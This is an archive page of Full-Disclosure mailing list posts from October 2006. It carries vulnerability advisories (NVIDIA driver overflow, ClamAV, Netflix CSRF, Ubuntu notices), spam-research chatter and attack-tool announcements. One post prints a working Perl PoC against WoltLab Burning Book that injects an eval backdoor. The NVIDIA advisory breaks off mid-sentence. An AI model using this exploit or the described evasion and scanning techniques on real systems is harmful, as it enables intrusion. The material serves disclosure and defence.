[Full-disclosure] Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux

2006-10-16 Thread advisory
___
 Rapid7, LLC Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___


Rapid7 Advisory R7-0025
Buffer Overflow in NVIDIA Binary Graphics Driver For Linux

   Published:  Oct 16, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0025.jsp

1. Affected system(s):

   KNOWN VULNERABLE:
   o NVIDIA Driver For Linux v8774
   o NVIDIA Driver For Linux v8762

   PROBABLY VULNERABLE:
   o NVIDIA Driver for FreeBSD
   o NVIDIA Driver for Solaris
   o Earlier versions

   KNOWN FIXED:
   o None

2. Summary

   The NVIDIA Binary Graphics Driver for Linux is vulnerable to a
   buffer overflow that allows an attacker to run arbitrary code as
   root. This bug can be exploited either locally or remotely (via
   a remote X client, or via an X client that visits a malicious web
   page). A working proof-of-concept root exploit is included with
   this advisory.

   The NVIDIA drivers for Solaris and FreeBSD are also likely to be
   vulnerable.

3. Vendor status and information

   NVIDIA Corporation
   http://www.nvidia.com

   There have been multiple public reports of this NVIDIA bug on the
   NVNews forum [1,2] and elsewhere, dating back to 2004 [3]. NVIDIA's
   first public acknowledgement of this bug was on July 7th, 2006. In a
   public posting [1] on the NVNews forum, an NVIDIA employee reported
   having reproduced the problem, assigned it bug ID 239065, and promised
   a fix would be forthcoming.

   As of the publication date, the latest NVIDIA binary driver is still
   vulnerable. Furthermore, it is our opinion that NVIDIA's binary driver
   remains an unacceptable security risk based on the large numbers of
   reproducible, unfixed crashes that have been reported in public forums
   and bug databases. This number does not include bugs reported directly
   to NVIDIA.

   1. http://www.nvnews.net/vbulletin/showthread.php?p=931048  (Jul 2006)
   2. http://www.nvnews.net/vbulletin/showthread.php?t=76493   (Sep 2006)
   3. https://bugs.freedesktop.org/show_bug.cgi?id=2129         (Dec 2004)
   4. http://lists.freedesktop.org/archives/xorg/2005-January/005642.html
   5. http://forums.gentoo.org/viewtopic.php?t=282107           (Jan 2005)
   6. https://bugs.eclipse.org/bugs/show_bug.cgi?id=87299       (Mar 2005)
   7. http://www.nvnews.net/vbulletin/showthread.php?t=76206   (Sep 2006)

4. Solution

   Disable the binary blob driver and use the open-source "nv" driver
   that is included by default with X.

5. Detailed analysis

   There are two NVIDIA graphics drivers for Linux: a closed-source
   binary blob driver provided by NVIDIA (which provides acceleration)
   and an open-source driver (which lacks acceleration). NVIDIA's
   binary blob driver contains an error in its accelerated rendering
   of glyphs (text character data) that can be exploited to write
   arbitrary data to anywhere in memory. The open-source driver is
   not vulnerable.

   The XRender extension provides a client function named
   XRenderCompositeString8 which tells the X server to render glyphs
   onto the screen. This request is processed by the server's
   ProcRenderCompositeGlyphs function. This function pulls the glyphs
   out of the render request, constructs a glyph list, and then calls
   into the graphics driver via a registered callback function.

   The NVIDIA binary blob driver registers a function named _nv000373X.
   This function calculates a bounding BoxRec of the total area occupied
   by the glyph data. It then uses Xalloc to allocate a buffer large
   enough to hold the data by multiplying width * height. This buffer
   is then passed to another internal function called _nv53X.

   The _nv53X function iterates over the glyph list and copies
   glyph data into the buffer using each glyph's accumulated width,
   xOff, height, and yOff values to calculate the destination position
   in the buffer. The NVIDIA binary blob driver does not check this
   calculation against the size of the allocated buffer. As a result,
   a short sequence of user-supplied glyphs can be used to trick the
   function into writing to an arbitrary location in memory.
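   To make the missing check concrete, the following is an added model in C
   of the allocate-then-place sequence described above. It is not NVIDIA's
   code (_nv000373X and _nv53X are closed source, so their real arithmetic
   is not known); the Glyph and Extent types, the "total width by tallest
   glyph" sizing rule and the sample glyph lists are constructed for the
   illustration. The buffer is sized from one set of glyph values while
   placement follows the client's xOff/yOff advances, and the hardened copy
   validates every destination rectangle against the allocation before the
   first byte is written.

```c
#include <limits.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the glyph path described above; not NVIDIA's code
 * (_nv000373X/_nv53X are closed source). Bitmaps are one byte per pixel. */
typedef struct {
    int width, height;   /* size of this glyph's bitmap */
    int xOff, yOff;      /* pen advance applied after the glyph is placed */
} Glyph;

typedef struct { int width, height; } Extent;

/* Allocation step: the buffer is sized from the glyphs' own dimensions
 * (total width, tallest glyph). Placement below follows the client's
 * xOff/yOff instead, and nothing ties the two together: that disagreement
 * is the class of bug the advisory describes. */
static Extent glyph_extent(const Glyph *g, int n)
{
    Extent e = {0, 0};
    for (int i = 0; i < n; i++) {
        e.width += g[i].width;
        if (g[i].height > e.height)
            e.height = g[i].height;
    }
    return e;
}

/* The missing check: index of the first glyph whose destination rectangle
 * would fall outside a width*height buffer, or -1 if every glyph fits.
 * Writes nothing, so it can be run over untrusted glyph lists. */
static int first_out_of_bounds(const Glyph *g, int n, Extent e)
{
    long long px = 0, py = 0;   /* accumulated pen position */
    for (int i = 0; i < n; i++) {
        if (g[i].width < 0 || g[i].height < 0 || px < 0 || py < 0 ||
            px + g[i].width > e.width || py + g[i].height > e.height)
            return i;
        px += g[i].xOff;
        py += g[i].yOff;
    }
    return -1;
}

/* Hardened copy: overflow-checked width*height, every destination checked
 * before the first write, and the whole request rejected (NULL) instead
 * of being written out of bounds. Caller frees the result. */
static uint8_t *render_glyphs(const Glyph *g, const uint8_t *const *bits, int n)
{
    Extent e = glyph_extent(g, n);
    if (e.width <= 0 || e.height <= 0 || e.width > INT_MAX / e.height)
        return NULL;
    if (first_out_of_bounds(g, n, e) != -1)
        return NULL;
    uint8_t *buf = calloc((size_t)e.width * (size_t)e.height, 1);
    if (buf == NULL)
        return NULL;
    int px = 0, py = 0;
    for (int i = 0; i < n; i++) {
        for (int row = 0; row < g[i].height; row++)
            memcpy(buf + (size_t)(py + row) * e.width + px,
                   bits[i] + (size_t)row * g[i].width, (size_t)g[i].width);
        px += g[i].xOff;
        py += g[i].yOff;
    }
    return buf;
}

/* Constructed sample lists (not the advisory's PoC); every glyph is 8x8. */
static const Glyph sample_text[2] = {{8, 8, 8, 0},    {8, 8, 8, 0}}; /* fits 16x8 */
static const Glyph sample_jump[2] = {{8, 8, 1000, 0}, {8, 8, 8, 0}}; /* 2nd at x=1000 */
static const Glyph sample_back[2] = {{8, 8, 0, -5},   {8, 8, 8, 0}}; /* 2nd at y=-5 */

/* Renders a sample with each bitmap filled with a distinct nonzero byte;
 * returns how many bytes of the result were written, 0 if rejected. */
static size_t render_sample(const Glyph *g, int n)
{
    uint8_t *bits[4];
    if (n > 4)
        return 0;
    for (int i = 0; i < n; i++) {
        size_t sz = (size_t)g[i].width * (size_t)g[i].height;
        bits[i] = malloc(sz);
        memset(bits[i], 0x10 + i, sz);
    }
    Extent e = glyph_extent(g, n);
    uint8_t *buf = render_glyphs(g, (const uint8_t *const *)bits, n);
    size_t written = 0;
    if (buf != NULL) {
        for (size_t k = 0; k < (size_t)e.width * (size_t)e.height; k++)
            written += buf[k] != 0;
        free(buf);
    }
    for (int i = 0; i < n; i++)
        free(bits[i]);
    return written;
}
```

   The two rejected samples show the two ways a client-chosen advance can
   push a destination outside the allocation (past its end, or before its
   start), which is exactly what the driver's copy never tests for.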

   It is important to note that glyph data is supplied to the X server
   by the X client. Any remote X client can gain root privileges on
   the X server using the proof of concept program attached.

   It is also trivial to exploit this vulnerability as a DoS by causing
   an existing X client program (such as Firefox) to render a long text
   string. It may be possible to use Flash movies, Java applets, or
   embedded web fonts to supply the custom glyph data necessary for
   reliable remote code execution.

   A simple HTML page containing an INPUT field with a long value is
   sufficient to demonstrate the 

Re: [Full-disclosure] Ask for spam...

2006-10-16 Thread Peter Dawson
I think the point here is that you seed your email addy to these freebie newsletters and then wait for the spammer to harvest the email addys.  Propagation window should be about 10-15 days and then you can counter-analyse the source data within smtp

On 10/16/06, Louis Wang <[EMAIL PROTECTED]> wrote:
> Maybe most of these emails are newsletters, not spam, huh?
> Could anyone give me a spam archive, or send spam to
> [EMAIL PROTECTED],  thanks.
>
> --
> homepage:http://www.wang-labs.com
>
> 2006/10/17, Michael Holstein <[EMAIL PROTECTED]>:
> > Here's what I did when researching the same thing ...
> >
> > Google "free stuff". Find a page with "thousands of free offers". Fill
> > one out and check *every* box. Reply to whatever "confirm" emails come in.
> >
> > I did a few of those "thousand freebie" things to various bogus email
> > addresses in a fake subdomain and was getting thousands per day (and it
> > wasn't long until the DHA attacks started on that newly created
> > subdomain either -- configure your first-touch MTA to blindly accept
> > anything as valid if you're curious, just be careful not to relay it).
> >
> > The nice thing about doing the subdomain trick is you can just delete
> > the subdomain when you're done and not waste your bandwidth (and disk
> > space) dealing with "test" SPAM.
> >
> > Cheers,
> >
> > Michael Holstein CISSP GCIA
> > Cleveland State University
>
> --
> Have a Good Day

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Ask for spam...

2006-10-16 Thread Louis Wang
Maybe most of these emails are newsletters, not spam, huh?
Could anyone give me a spam archive, or send spam to
[EMAIL PROTECTED],  thanks.


--
homepage:http://www.wang-labs.com

2006/10/17, Michael Holstein <[EMAIL PROTECTED]>:
> Here's what I did when researching the same thing ...
>
> Google "free stuff". Find a page with "thousands of free offers". Fill
> one out and check *every* box. Reply to whatever "confirm" emails come in.
>
> I did a few of those "thousand freebie" things to various bogus email
> addresses in a fake subdomain and was getting thousands per day (and it
> wasn't long until the DHA attacks started on that newly created
> subdomain either -- configure your first-touch MTA to blindly accept
> anything as valid if you're curious, just be careful not to relay it).
>
> The nice thing about doing the subdomain trick is you can just delete
> the subdomain when you're done and not waste your bandwidth (and disk
> space) dealing with "test" SPAM.
>
> Cheers,
>
> Michael Holstein CISSP GCIA
> Cleveland State University
>


-- 
Have a Good Day



[Full-disclosure] [USN-365-1] libksba vulnerability

2006-10-16 Thread Kees Cook
=== 
Ubuntu Security Notice USN-365-1   October 16, 2006
libksba vulnerability
CVE-2006-5111
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libksba8 0.9.9-2ubuntu0.5.04

After a standard system upgrade you need to restart your session to
effect the necessary changes.

Details follow:

A parsing failure was discovered in the handling of X.509 certificates 
that contained extra trailing data.  Malformed or malicious certificates
could cause services using libksba to crash, potentially creating a 
denial of service.


Updated packages for Ubuntu 5.04:


[Full-disclosure] NVIDIA Linux/BSD/Solaris Drivers Local Root Buffer Overflow

2006-10-16 Thread Alexander Hristov
NVIDIA Linux/BSD/Solaris Drivers Local Root Buffer Overflow
   KNOWN VULNERABLE:
   o NVIDIA Driver For Linux v8774
   o NVIDIA Driver For Linux v8762

   PROBABLY VULNERABLE:
   o NVIDIA Driver for FreeBSD
   o NVIDIA Driver for Solaris
   o Earlier versions

   KNOWN FIXED:
   o None

http://securitydot.org/xpl/exploits/vulnerabilities/articles/1714/exploit.html
-- 
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



Re: [Full-disclosure] Ask for spam...

2006-10-16 Thread Dude VanWinkle
On 10/16/06, Michael Holstein <[EMAIL PROTECTED]> wrote:
> Here's what I did when researching the same thing ...
>
> Google "free stuff". Find a page with "thousands of free offers". Fill
> one out and check *every* box. Reply to whatever "confirm" emails come in.


Technically that's not spam, since you solicit those emails and then
confirm your solicitation.

-JP



[Full-disclosure] some solutions for HITB 2006 CTF

2006-10-16 Thread matador matador
Hi,

I did some solutions for the HITB 2006 CTF daemons.

They are at this website: http://matador.altervista.org



[Full-disclosure] iDefense Security Advisory 10.15.06: Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability

2006-10-16 Thread iDefense Labs
Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability

iDefense Security Advisory 10.15.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 15, 2006

I. BACKGROUND

Clam AntiVirus is a multi-platform GPL anti-virus toolkit whose main
purpose is integration into electronic mail servers.  More
information about ClamAV can be found at http://clamav.net/.  Microsoft
Compressed HTML Help (CHM) files are commonly used for Windows-based
software documentation.

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in Clam
AntiVirus's ClamAV could allow attackers to crash the virus scanning
service.

The vulnerability specifically exists due to improper handling of a
specially crafted CHM file.  While processing such a file, ClamAV may
attempt to read an invalid memory location, resulting in abnormal
termination of the scanning service.

III. ANALYSIS

Successful exploitation could allow an attacker to crash the ClamAV
virus scanning service.  Exploitation requires that attackers send a
specially constructed CHM file through an e-mail gateway or personal
anti-virus client using the ClamAV scanning engine.

IV. DETECTION

iDefense has confirmed this vulnerability affects Clam AntiVirus ClamAV
v0.88.4. All prior versions that implement CHM file scanning are
suspected to be vulnerable.

V. WORKAROUND

iDefense is unaware of any effective workarounds for this issue.

VI. VENDOR RESPONSE

The ClamAV team has addressed this vulnerability within version 0.88.5.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-5295 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/28/2006  Initial vendor notification
09/29/2006  Initial vendor response
10/10/2006  Second vendor notification
10/15/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Damian Put and an
anonymous researcher.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.




[Full-disclosure] iDefense Security Advisory 10.15.06: Clam AntiVirus ClamAV rebuildpe Heap Overflow Vulnerability

2006-10-16 Thread iDefense Labs
Clam AntiVirus ClamAV rebuildpe Heap Overflow Vulnerability

iDefense Security Advisory 10.15.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 15, 2006

I. BACKGROUND

Clam AntiVirus is a multi-platform GPL anti-virus toolkit whose main
purpose is integration into electronic mail servers.  More
information is available from http://clamav.net/

II. DESCRIPTION

Remote exploitation of a buffer overflow in Clam AntiVirus allows
attackers to potentially execute arbitrary code or cause a denial of
service condition.

This vulnerability specifically exists within code dealing with PE
(Portable Executable) format files. While processing certain PE
elements, two variables can be very large and an integer overflow
could occur. This would result in less memory being allocated than
the programmer expected, and subsequent code would overflow the heap
buffer.

III. ANALYSIS

Successful exploitation requires an attacker to send a specially
constructed executable file through a mail gateway or personal anti-
virus client utilizing the ClamAV scanning engine.

IV. DETECTION

iDefense has confirmed this vulnerability on version 0.88.1 and 0.88.4
of ClamAV.  All previous versions are suspected to be vulnerable to this
issue.

V. WORKAROUND

iDefense is not aware of any effective workarounds.

VI. VENDOR RESPONSE

The ClamAV team has addressed this vulnerability within version 0.88.5.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-4182 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

08/16/2006  Initial vendor notification
08/20/2006  Initial vendor response
10/10/2006  Second vendor notification
10/15/2006  Coordinated public disclosure

IX. CREDIT

The discovery of this vulnerability is credited to Damian Put
<[EMAIL PROTECTED]>.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.




[Full-disclosure] [USN-364-1] Xsession vulnerability

2006-10-16 Thread Kees Cook
=== 
Ubuntu Security Notice USN-364-1   October 16, 2006
xinit vulnerability
CVE-2006-5214
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  xinit1.0+0.99.1-4ubuntu0.1

Ubuntu 6.06 LTS:
  xinit1.0.1-0ubuntu3.1

After a standard system upgrade you need to restart your session to
effect the necessary changes.

Details follow:

A race condition existed that would allow other local users to see error 
messages generated during another user's X session.  This could allow 
potentially sensitive information to be leaked.


Updated packages for Ubuntu 5.10:


Updated packages for Ubuntu 6.06 LTS:


Re: [Full-disclosure] Ask for spam...

2006-10-16 Thread Michael Holstein
Here's what I did when researching the same thing ...

Google "free stuff". Find a page with "thousands of free offers". Fill 
one out and check *every* box. Reply to whatever "confirm" emails come in.

I did a few of those "thousand freebie" things to various bogus email 
addresses in a fake subdomain and was getting thousands per day (and it 
wasn't long until the DHA attacks started on that newly created 
subdomain either -- configure your first-touch MTA to blindly accept 
anything as valid if you're curious, just be careful not to relay it).

The nice thing about doing the subdomain trick is you can just delete 
the subdomain when you're done and not waste your bandwidth (and disk 
space) dealing with "test" SPAM.

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University



Re: [Full-disclosure] Ask for spam...

2006-10-16 Thread Joe Feise
Louis Wang writes: 

> Hi Guys:
> I'm doing research on AntiSpam personally, I need a lot of spam
> samples. I have tried a lot to incur spam, but so far I can only get
> about 300 spam per day.
> Could anybody kindly help me with spam collection? I use
> [EMAIL PROTECTED] to collect spam. Please send as much spam as
> possible to that mailbox. Or if you have a spam archive, please send
> it to me at [EMAIL PROTECTED]
> Thanks in Advance!

Post to Usenet with the email address you want to get spam at. It will come 
flowing in ;-) 

 -Joe



[Full-disclosure] Netflix Cross Site Request Forgery Vulnerability

2006-10-16 Thread Dave Ferguson
ANNOUNCEMENT

Netflix Cross Site Request Forgery Vulnerability

Release Date: 10/16/2006

Netflix notified: 9/25/2006

Author: David Ferguson, Security Researcher -- gmdavef [at] gmail com

INTRODUCTION

Recently I found that the Netflix.com site was vulnerable to Cross Site
Request Forgery (XSRF), also known as hostile linking.  I notified
Netflix about this problem on 9/25/06 and it appears they are finally
making the necessary corrections.  I want to make the information
public to raise awareness of this type of vulnerability and hopefully
educate others who may not have heard about it before.  An excellent
whitepaper about XSRF by Jesse Burns can be found at
http://www.isecpartners.com/documents/XSRF_Paper.pdf.

BACKGROUND

Netflix is a company that offers a popular online DVD rental service.
Over 5.5 million people are currently Netflix subscribers.  Many users
of the Netflix web site, when logging in, choose the option that says
"Remember me on this computer".  This option causes one or more
cookies to be written to the user's computer.  The cookie is sent
automatically the next time a user visits the Netflix site,
eliminating the need to enter credentials again.

VULNERABILITY OVERVIEW

XSRF is an application-level vulnerability where an attacker takes
advantage of the trust that the web site has in the cookie.  Commands
are issued on the target application unbeknownst to the user.  By
exploiting the XSRF vulnerability, an attacker could have made changes
to a victim's Netflix account simply by having him visit a malicious
web site.  Any Netflix user who had chosen the "remember me" option,
or who happened to be logged in at the time, was subject to this
attack.  The victim would not have seen anything out of the ordinary
that might indicate his Netflix account was affected.

ATTACK SCENARIOS

Netflix has corrected several of the vulnerabilities.  Prior to the
corrections, an attacker could use XSRF to perpetrate a number of
actions on the victim including:

 - adding movies to his rental queue (still possible as of 10/16/06 a.m.)
 - adding a movie to the top of his rental queue (still possible as of
10/16/06 a.m.)
 - changing the name and address on the account
 - enabling/disabling extra movie information
 - changing the email address and password on the account (was limited
exposure only)
 - cancelling the account (Unconfirmed/Conjectured)

Chaos and/or embarrassment could result if an attacker decided to add
random DVDs to the top of each victim's rental queue.  In many cases,
the attacker-chosen DVDs would have shipped out and arrived before
the change was noticed.  It is also possible to add dozens or even
hundreds of DVDs to a victim's rental queue, all without his
knowledge.

One of the most serious exploits was the ability to change the name
and mailing address on the account.  An attacker could have changed
the name and address (or just the address) on a large number of
Netflix accounts.  DVDs would subsequently have been shipped to the
address of his choice and stolen.

Another harmful exploit was the potential ability to change email
address and password on the account.  This particular exposure was
limited in nature because the Netflix site normally requires input of
the current password before changing the email address or password on
the account.  However, there was a certain time period after a user
signed in where the current password was not required.  During this
time period, it was possible for a malicious site to cause the email
address and password on a victim's account to be changed.  The
legitimate user would have been locked out of his account and full
control given to the attacker.

PROTECTING YOURSELF

If you're a Netflix subscriber, there are several ways you can protect
yourself until Netflix fully fixes their site.  These safeguards would
also help protect against XSRF vulnerabilities in other sites.

Option 1 -- Don't use the "remember me" option when signing in.  That
will prevent stored cookies and protect you against XSRF attacks.  You
should also avoid visiting unknown or untrusted sites while signed in
to Netflix.  Finally, make sure to sign out and close all browser
windows when finished using the Netflix site.

Option 2 -- Use one browser (e.g., Firefox) exclusively for Netflix,
and another browser (e.g., Internet Explorer) for all other web sites.

Option 3 (not recommended) -- Use Firefox as your web browser and tell
it not to load images from other sites.  You can do this by putting a
check in the box next to "for the originating web site only" under
Tools--Options--Content.  Please note that this option may not be 100%
effective.

MITIGATING XSRF

Developers can prevent XSRF vulnerabilities from appearing in web
applications in several ways.  The white paper by Jesse Burns
describes several alternatives.  The best technique appears to be
implementing a cryptographic token that must be passed as a parameter
with every request.  The cryptographic token would 

[Full-disclosure] :ShAnKaR: WoltLab Burning Book <=1.1.2 multiple vulnerabilities

2006-10-16 Thread 3APA3A
Hello bugtraq,

 ShAnKaR  (sec at shankar.antichat.ru ) reports multiple vulnerabilities
 in WoltLab Burning Book. Original message in Russian is available from
 http://www.security.nnov.ru/Odocument711.html

 Short translation:

 Author: ShAnKaR  (sec at shankar.antichat.ru)
 Vendor: woltlab.de
 Tested version: WoltLab Burning Book 1.1.2
 Level: Critical
 Class: Remote code execution

 addentry.php file contains this code:

while(list($key,$val)=each($_POST)) {
$$key=$val;
 }

 There is no validation of the variable names sent with the POST request,
 so it is possible to overwrite system variables. E.g. here:


$db->query("INSERT INTO bgb".$n."_posts
    (iconid,authorname,posttime,message,nosmilies,email,homepage,icq,aim,yim,msn,ipaddress,useragent,visible)
    VALUES ('".intval($iconid)."','".addslashes($name)."',".time().",'".addslashes($message)."','"
    .intval($nosmilies)."','".addslashes($email)."','".addslashes($homepage)."','".intval($icq)."','"
    .addslashes($aim)."','".addslashes($yim)."','".addslashes($msn)."','".$REMOTE_ADDR."','"
    .$HTTP_USER_AGENT."','".(($moderateposts) ? ("0") : ("1"))."')");
 
 it is possible to add arbitrary data to the database, and later this
 data can be executed as PHP code:

 eval("\$template->output(\"".$template->get("index")."\");");

 Exploit code (burning_book.pl):

#!/usr/bin/perl

# woltlab.de burning book <=1.1.2 SQL and PHP injection PoC
# use /index.php?q=phpinfo();exit;
# ShAnKaR sec[A]shankar.antichat.ru
# http://antichat.ru/

use LWP;
die("use ./burn-book.pl http://localhost/wbbook/ [1(number book db, default 
`1`)]\n") if !$ARGV[0];$ARGV[1]='' if !$ARGV[1];
my $ua=LWP::UserAgent->new();
$ua->post($ARGV[0].'/addentry.php',[reg_image=>0,send=>'send',name=>1,message=>1,
n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES 
(char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]);


-- 
/3APA3A
http://security.nnov.ru/



[Full-disclosure] VoMM: Taking browser exploits to the next level

2006-10-16 Thread avivra
Exploits for browser vulnerabilities are here to stay.
Most security products today are using reactive methods (signatures)
to detect the specific exploit, instead of trying to detect the
general case of the vulnerability exploitation. I already demonstrated
that evading those signatures is very easy.

H.D. Moore, LMH, and I have decided to generalize the evasion methods
and package them all into one project.

Introducing: VoMM (eVade-o-Matic Module for metasploit) - Taking
browser exploits to the next level.
The purpose of this project is to create a module for Metasploit that
will take any given browser exploit and make it as undetectable as
possible.

Currently, most Anti-Virus signatures rely on "variants". Meaning,
any little change in the malicious code is considered by the AV as a
new variant.
The VoMM project shows that this procedure cannot be applied to
browser exploits, as each exploit can have an endless number of
"variants" with no change to the server side code.

http://aviv.raffon.net/2006/10/15/VoMMTakingBrowserExploitsToTheNextLevel.aspx

-- Aviv.



Re: [Full-disclosure] Vuln ....

2006-10-16 Thread C. Hamby

Nah. That's probably WAY too advanced for 'em.  I get the feeling this
is the AOL sort of person.
Honestly, I'm surprised they figured out how to subscribe to this list
in the first place...


Ferdinand Klinzer wrote:
> Google search : Intro to HTML
> 
> cheers
> 
> On 16.10.2006 at 12:42, C. Hamby wrote:
> 
>> Yipe!
>>
>> Ya know if you need an "intro to HTML" book I can probably scare
>> one up
>> for ya... :-)
>>
>> Pink Hat wrote:
>>> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
>>>> Hey you could start by writing those sites in english :P
>>>>
>>> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-
>>> HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
>>>
>>> Not perfect but readable... I guess...




Re: [Full-disclosure] Vuln ....

2006-10-16 Thread Ferdinand Klinzer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Google search : Intro to HTML

cheers

On 16.10.2006 at 12:42, C. Hamby wrote:

> Yipe!
>
> Ya know if you need an "intro to HTML" book I can probably scare  
> one up
> for ya... :-)
>
> Pink Hat wrote:
>> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
>>> Hey you could start by writing those sites in english :P
>>>
>>
>> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal- 
>> HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
>>
>> Not perfect but readable... I guess...
>>
>>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (Darwin)

iD8DBQFFM3NgivpgT1glX4cRAiiDAKCJSYmVrMNRbd3fnqk2eVUo2FWylgCgoxoQ
BrkTpdSb3gdBQsBdoS6+psU=
=ctNs
-END PGP SIGNATURE-



Re: [Full-disclosure] Vuln ....

2006-10-16 Thread C. Hamby
Yipe!

Ya know if you need an "intro to HTML" book I can probably scare one up
for ya... :-)

Pink Hat wrote:
> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
>> Hey you could start by writing those sites in english :P
>>
> 
> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
> 
> Not perfect but readable... I guess...
> 
> 



[Full-disclosure] speaking of code crunching... (challenge)

2006-10-16 Thread Gadi Evron
Gil Dabah (who did the cool code crunching on the unsupported systems
ZERT VML patch) just wrote some incredible code crunching. I don't
understand most of it.

The challenge was to create a PE that downloads a file from the Internet
and executes it, which will be smaller than what his friends did. He got
to 411 bytes.

He intends to keep working on it to get to below 400 bytes, and posts a
sort of challenge to see if someone else can get there first (without, 
say, making the URL shorter). :)

You can find the binary here:
http://ragestorm.net/tiny/tiny.exe

You can find his blog entry on what he did to achieve this, and the
challenge, here:
http://blogs.securiteam.com/index.php/archives/675

Gadi.



[Full-disclosure] AttackAPI 0.8 is OUT

2006-10-16 Thread pdp (architect)
http://www.gnucitizen.org/blog/attackapi-08-is-out
http://www.gnucitizen.org/projects/attackapi

I would recommend AttackAPI 0.8 to everyone who is interested in
high-end. It provides a good demonstration of what is possible today.
That, I hope, will take our awareness even further.

AttackAPI slowly moves to its 1.0 release where I am planning to
standardize its core, fix discovered bugs and make it even more
cross-platform. Still, there is a long way to go but I am willing to
take my chances. There are plans for 0.9 but I will keep them
undisclosed for now.

So what does 0.8 have to offer? There are a couple of things that are
worth attention. I will start in chronological order.

The Client interface can be used to enumerate the current client. It
has functionalities to fingerprint the current operating system,
installed plugins, the browser in use and the local NATed IP address
and hostname. This tool is brilliant for doing the first steps of any
targeted attack.

The Server, on the other hand, can be used to fingerprint the current
server. It provides information about its domain, IP address,
platform, server software and the application architecture. Its
purpose is to identify what is currently available. That is important
because the Web is a very distributed and agile network and controlling
dozens of injected clients is a task on its own.

The AuthorizationForcer interface is nothing but a technique that can
be used when the attacker is interested in discovering Basic Auth
credentials. It is not very generic but it can be quite successfully
executed on internal networks where the security is more relaxed and
administrators make use of shortcut URLs to login to different
devices.

The ExtensionScanner interface is all the attacker needs to find
currently installed extensions. Why is that important? Well, there is
a lot one can say but in general that information can be used to find
who is previewing the current resource (you are a developer or a user),
what services you are currently using (do you have flickr or
del.icio.us extensions installed) and also locate vulnerable
extensions. If you are a developer, it is very likely that you have
access to source code repositories. This information combined with
other techniques can be used to steal your work or identify projects
that are yet to be released. The age of professional attackers is
slowly hitting the 21st century.

The HistoryDumper is every web user's nightmare when it comes to
privacy. Attackers can abuse Firefox, IE and Opera accessibility
functionalities to tell where you have been. The marketing tycoons
will use it to sell you even more goods. This is an excellent tool for
corporate espionage.

Then comes the NetworkSweeper. The tool does one thing only:
discover live hosts. Currently it supports only one type of sweeping
but in 0.9 and 1.0 versions of AttackAPI a lot more other techniques
will be implemented.

But what is a sweep without a port scan? Port scanning from JavaScript
used to be considered an impossible task. Well, that's not the case
anymore. Today attackers can use your browser to scan everybody they
want without any fear of being penalized. Distributed scanning is also
possible. Imagine how a well spread backdoored media file can scan the
